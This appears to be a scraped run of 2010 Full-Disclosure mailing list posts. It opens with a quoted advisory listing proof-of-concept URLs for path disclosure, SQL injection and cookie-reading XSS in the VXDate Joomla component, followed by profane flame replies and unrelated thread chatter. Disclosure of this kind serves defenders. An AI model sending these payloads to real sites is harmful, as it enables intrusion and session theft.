> 18.01.2010 - informed developers.
> 13.03.2010 - disclosed at my site.
>
> Details:
>
> These are Full path disclosure, SQL Injection and Cross-Site Scripting vulnerabilities.
>
> Full path disclosure:
>
> http://site/index.php?option=com_vxdatect=’
> http://site/index.php?option=com_vxdatect=1md=detailsid=’
> http://site/index.php?option=com_vxdatect=1md=editformid=’
>
> SQL Injection:
>
> http://site/index.php?option=com_vxdatect=1md=detailsid=-1%20or%20version()=5
> http://site/index.php?option=com_vxdatect=1md=editformid=-1%20or%20version()=5
>
> XSS:
>
> http://site/index.php?option=com_vxdatect=1md=detailsid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
> http://site/index.php?option=com_vxdatect=1md=editformid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
>
> Vulnerable are potentially all versions of VXDate.
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
Re: [Full-disclosure] SQL DB Structure Extraction vulnerabilities
No shit eh? All your posts are pure shit, it's a fucking spam made to redirect some dummy users to your crappy website. Seriously dude, from now on spam your .ua mailing list instead of FD.

On Thu, Mar 18, 2010 at 8:36 AM, MustLive mustl...@websecurity.com.ua wrote:

> Hello Full-Disclosure!
>
> Yesterday I wrote English version of my article SQL DB Structure Extraction vulnerabilities (http://websecurity.com.ua/4038/).
>
> There is such variety of Information Leakage vulnerabilities as SQL DB Structure Extraction. This vulnerability lies in that there is information leakage in web application about structure of the database. This information leakage can be of use at SQL Injection attack.
>
> Such vulnerability I found first time already in 2006 (at one site) and gave it this name. Such vulnerabilities I found at many web sites and also in many web applications. In the article I talked about SQL DB Structure Extraction, different variants of SQL Errors (three variants) and about difference between SQL DB Structure Extraction and SQL Error.
>
> You can read the article SQL DB Structure Extraction vulnerabilities at my site: http://websecurity.com.ua/4038/
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
On Sun, Mar 21, 2010 at 10:41 PM, Mark Byrne boogiebr...@yahoo.co.uk wrote:

> this mailing list has, over the last 6 months or so (at least) been full of immature script-kiddy dicks

I think it's funny that he has been pretending to be me for over 12 months non-stop and failed miserably. Please try harder Son of Ram, I need more content to forward to SOCA so they can prosecute you. Remember and here is a quote from Andy Auld, head of intelligence at SOCA's e-crime department:

“The legal system doesn’t work against nicknames and email addresses. It works against real names and real addresses”.

http://www.soca.gov.uk/news/172-darkmarket-mastermind-jailed

Andrew
Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
Or village idiot. ;-)

--- Christian Sciberras uuf6...@gmail.com wrote on Sun, 21.3.2010:

From: Christian Sciberras uuf6...@gmail.com
Subject: Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
To: Mark Byrne boogiebr...@yahoo.co.uk
CC: full-disclosure@lists.grok.org.uk
Date: Sunday, 21 March 2010, 22:34

> You might want to consider that every mailing list have its own court jester. ;)
Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
* Andrew Walberg (andrew.walb...@rocketmail.com) wrote:

> (...) Someone please god help. I need ideas. I'm not a criminal. I've done nothing wrong. Give me tips.

http://www.skeptictank.org/hs/vanish.htm

kind regards, Thomas Penteker

--
Vendor no longer supports the product